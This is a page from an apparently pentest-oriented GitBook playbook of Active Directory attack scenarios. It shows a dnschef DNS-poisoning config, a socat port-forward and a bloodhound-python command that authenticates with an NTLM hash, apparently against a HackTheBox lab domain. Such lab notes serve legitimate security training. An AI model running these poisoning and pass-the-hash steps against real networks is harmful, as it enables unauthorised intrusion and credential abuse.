🏴‍☠️
PlayBook
  • 🎄Active Directory Checklist
  • 👩‍✈️Active Directory Commands
  • ⛓️Scenarios
    • Allowed To Delegate
    • Ansible Vault found
    • You have found an Azure sync sql server and have access
    • Backup Operator SeBackupPrivilege dump ntds.dit
    • Bypass AMSI
    • Certificate Authority create certificate request
    • Certificate Authority Vulnerable Cert
    • Certificate Found
    • Check connectivity with ping
    • Debug Python
    • Decode Strings
    • Defender Outbound Connection
    • Defender remove definitions
    • Deleted AD Object
    • Deserialization Payloads
    • dig enumeration
    • DnsAdmin PrivEsc
    • DomainDump analysys
    • Files found
    • Evil Winrm Kerberos
    • Find ipv6 Ipv6 Port Scanning
    • Find Write to Share NTLM Theft
    • Force auth back to yourself
    • Forward from host Enable Ip Forwarding Kali
    • GPP Groups.xml
    • Grep email from complex content
    • Icacls protect binary from system
    • install dacledit.py
    • Invoke WebRequest vhost
    • Jenkins Found
    • Kerberos Auth required
    • Overview
    • Get Laps passwords
    • ldapmodify to update AD
    • LibreOffice Reverse Shell macro
    • lsass.dmp
    • Offline Sam dump
    • Powershell Oneliners
    • Port 135 MSRPC
    • RBCD GenericAll Computer
    • ReadGSMAPassword
    • Reset password with mimikatz
    • Shadow Credentials
    • Sign Powershell script
    • SMTP Server Found
    • SOCAT to redirect ports
    • System on DC TGT Delegation
    • Take ownership of files and set permissions
    • TightVnc Registry Password
    • WinRM requires ssl
    • WriteDACL Rights
    • AD Allowed to change owner
    • Add AD DNS entry Scripted Outbound Connection Found
Powered by GitBook
On this page
  1. Scenarios

SOCAT to redirect ports

In cases where a domain is available on IPv6 ports and not ipv4 bloodhound ingestors will send DNS queries for A records which only support ipv4. Use dnschef to poison the responses and setup the msds records for the domain and use A records to point dc and gc to 127.0.0.1. Use socat to forward traffic on the ports to the IPv6 address

sudo socat TCP-LISTEN:389,fork TCP:apt:389

DNSCHEF INI

[A]
apt.htb.local=127.0.0.1

[AAAA]
apt=dead:beef::b885:d62a:d679:573f
htb=dead:beef::b885:d62a:d679:573f
htb.local=dead:beef::b885:d62a:d679:573f
apt.htb.local=dead:beef::b885:d62a:d679:573f

[SRV]
*.*.htb.local=0 5 389 apt.htb.local

bloodhound-python -u 'henry.vinson' -c all -d htb.local -dc apt.htb.local -gc apt.htb.local --hashes :e53d87d42adaa3ca32bdb34a876cbffb -ns 127.0.0.1 --zip

PreviousSMTP Server FoundNextSystem on DC TGT Delegation
⛓️